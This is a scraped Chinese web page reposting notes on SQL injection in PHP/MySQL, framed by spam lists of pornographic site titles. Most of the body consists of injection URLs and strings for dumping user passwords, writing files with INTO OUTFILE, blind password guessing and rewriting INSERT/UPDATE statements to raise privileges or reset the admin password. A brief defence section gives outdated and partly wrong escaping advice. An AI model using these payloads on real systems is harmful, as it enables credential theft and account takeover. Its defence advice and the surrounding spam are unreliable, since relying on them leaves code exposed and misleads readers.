天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

PHP的SQL注入實現(測試代碼安全不錯)

SQL注入的重點就是構造SQL語句,只有靈活的運用SQL
語句才能構造出牛比的注入字符串。學完之后寫了點筆記,已備隨時使用。希望你在看下面內容時先了
解SQL的基本原理。筆記中的代碼來自網絡
===基礎部分===
本表查詢:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union聯合語句:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

導出文件:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT語句:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
構造homepage值為:http://4ngel.NET', '3')#
SQL語句變為:INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.NET', '3')#', '1');

UPDATE語句:我喜歡這樣個東西
先理解這句SQL
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
如果此SQL被修改成以下形式,就實現了注入
1:修改homepage值為
http://4ngel.NET', userlevel='3
之后SQL語句變為
UPDATE user SET password='mypass', homepage='http://4ngel.NET', userlevel='3' WHERE id='$id'
userlevel為用戶級別
2:修改password值為
mypass)' WHERE username='admin'#
之后SQL語句變為
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3:修改id值為
' OR username='admin'
之后SQL語句變為
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

===高級部分===
常用的MySQL內置函數
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
char()
load_file()
……
函數應用
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) 相當于angel,十進制
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

確定數據結構的字段個數及類型
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

猜數據表名
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

跨表查詢得到用戶名和密碼
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

其他
#驗證第一位密碼
http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===注入防范===
服務器方面
magic_quotes_gpc設置為On
display_errors設置為Off
編碼方面
$keywords = addslashes($keywords);
$keywords = str_replace("_","/_",$keywords);
$keywords = str_replace("%","/%",$keywords);
數值類型
使用intval()抓換
字符串類型
SQL語句參數中要添加單引號
下面代碼,用于防治注入
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace("_","/_",$keywords);
$keywords = str_replace("%","/%",$keywords);
}
有用的函數
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
參考文章:
http://www.4ngel.NET/article/36.htm (SQL Injection with MySQL)中文
http://www.phpe.NET/mysql_manual/06-4.html(MYSQL語句參考)

php技術PHP的SQL注入實現(測試代碼安全不錯),轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 囚禁固定在调教椅上扩张H 秋霞最新高清无码鲁丝片 秋霞在线看片无码免费 | 总裁呻吟双腿大开男男H | 一区二区三区无码高清视频 | 亚洲综合香蕉在线视频 | 97色伦图片97色伦图影院久久 | 阿离被扒开双腿疯狂输出 | 98久久人妻无码精品系列蜜桃 | av视频在线免播放观看 | caoporon超碰在线视频 | 国产亚洲精品精华液 | 无人区乱码区1卡2卡三卡在线 | wwwav在线 | WWW国产精品人妻一二三区 | 久久水蜜桃亚洲AV无码精品偷窥 | 国产欧美精品国产国产专区 | 日韩在线看片中文字幕不卡 | 中文字幕亚洲欧美日韩2019 | 亚洲免费三级电影 | 空姐厕所啪啪啪 | 717影院理论午夜伦不卡久久 | 亚洲国产系列一区二区三区 | 男人的天堂久久精品激情a 男人的天堂黄色片 | 97影院理论午夜伦不卡偷 | 欧美特黄99久久毛片免费 | 紧缚束缚调教丨vk | 俄罗斯1819y0u | 里番※琉璃全彩acg奈亚子 | 色久久综合视频本道88 | 大地影院日本韩国电影免费观看 | 无码日韩人妻精品久久蜜桃入口 | 精品伊人久久久 | 一个人的免费高清影院 | 久久精品热老司机 | japanese from色系| 狠很橹快播 | 和I儿媳妇激情 | 日产日韩亚洲欧美综合搜索 | 久久亚洲精品成人 | 色婷婷国产精品视频一区二区 | 色一欲一性一乱一区二区三区 | aaa在线观看视频高清视频 |